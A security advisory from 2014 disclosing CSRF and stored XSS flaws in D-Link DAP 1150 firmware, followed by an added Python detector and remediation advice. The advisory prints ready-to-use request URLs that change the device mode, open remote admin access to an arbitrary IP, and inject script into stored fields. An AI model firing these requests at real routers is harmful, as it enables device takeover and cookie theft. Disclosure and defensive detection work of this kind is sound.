SECURITYVULNS:DOC:30554
May 04, 2014

Multiple CSRF and XSS vulnerabilities in D-Link DAP 1150

Hello 3APA3A!

In 2011 and the beginning of 2012 I wrote about multiple vulnerabilities (http://securityvulns.ru/docs27440.html, http://securityvulns.ru/docs27677.html, http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozen). At that time I wrote about vulnerabilities in the admin panel in Access Point mode, and now I'll write about holes in Router mode.

I present new vulnerabilities in this device. There are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150 (Wi-Fi Access Point and Router).

SecurityVulns ID: 12076.


Affected products:

The following model is vulnerable: D-Link DAP 1150, Firmware version 1.2.94. This model with other firmware versions must also be vulnerable. D-Link ignored all vulnerabilities in this device (as in other devices which I informed them about) and still hasn't fixed them.


Details:

I remind you that in the first report about vulnerabilities in D-Link DAP 1150 (http://securityvulns.ru/docs27440.html), I wrote about CSRF in the login form and other vulnerabilities, which allow remotely logging into the admin panel to conduct CSRF and XSS attacks inside the admin panel.

CSRF (WASC-09):

In the section Advanced / Device, it's possible to change the device mode via CSRF. If access point mode is on, then router mode needs to be turned on in order to attack the vulnerabilities in router mode.

Turn on access point mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22ap%22}&res_pos=0

Turn on router mode:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22router%22}&res_pos=0

CSRF (WASC-09):

In the section Advanced / Remote access, it's possible via CSRF to add, edit and delete the settings of remote access to the web interface. The following request will allow remote access to the admin panel from IP 50.50.50.50.

Add:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1

Edit:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0

Delete:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=0

XSS (WASC-08):

These are persistent XSS vulnerabilities. The code will execute in the section Advanced / Remote access.

Attack via the add function in the res_buf parameter (in fields: IP address, Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1

Attack via the edit function in the res_buf parameter (in fields: IP address, Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0

I mentioned these vulnerabilities on my site (http://websecurity.com.ua/7137/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
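
A proxy-side check for the requests described in this advisory, as an added example that is not part of the original advisory or of D-Link's code: it flags configuration writes to index.cgi that arrive with a missing or foreign Referer, and res_buf entries whose ips or source_mask is not an IPv4 value. The function names, the Referer policy and the sample requests are assumptions constructed for illustration.

```python
import ipaddress
import json
from urllib.parse import parse_qs, urlencode, urlsplit

DEVICE_ORIGIN = "http://192.168.0.50"  # admin address used in the advisory


def is_ipv4(value):
    """True only for a dotted-quad string (an address or a mask)."""
    try:
        ipaddress.IPv4Address(value if isinstance(value, str) else "")
        return True
    except ValueError:
        return False


def review_request(url, referer):
    """Return findings for one logged request to the admin CGI."""
    findings = []
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    if not parts.path.endswith("/index.cgi") or "res_config_action" not in query:
        return findings  # not a configuration write
    # Assumed policy: a write with a missing or foreign Referer did not come from the admin UI.
    if not (referer or "").startswith(DEVICE_ORIGIN + "/"):
        config_id = query.get("res_config_id", ["?"])[0]
        findings.append("cross-site config write (res_config_id=%s)" % config_id)
    try:
        buf = json.loads(query.get("res_buf", ["{}"])[0])
    except ValueError:
        return findings + ["res_buf is not valid JSON"]
    if isinstance(buf, dict):
        for field in ("ips", "source_mask"):
            if field in buf and not is_ipv4(buf[field]):
                findings.append("%s is not an IPv4 value: %r" % (field, buf[field]))
    return findings


def sample_url(buf):
    """Build a constructed request in the shape shown in the advisory."""
    params = {"res_config_action": 3, "res_config_id": 16, "res_buf": json.dumps(buf)}
    return DEVICE_ORIGIN + "/index.cgi?" + urlencode(params)


if __name__ == "__main__":
    entry = {"ips": "10.0.0.5", "source_mask": "255.255.255.0", "sport": 80, "dport": "80"}
    print(review_request(sample_url(entry), DEVICE_ORIGIN + "/index.cgi"))
    print(review_request(sample_url(entry), "http://example.test/page.html"))
    print(review_request(sample_url(dict(entry, ips="<i>x</i>")), DEVICE_ORIGIN + "/index.cgi"))
```

This only observes traffic in front of the device; the fix belongs in the firmware, with an anti-CSRF token on every configuration write and HTML-encoding of stored values when the Remote access page renders them.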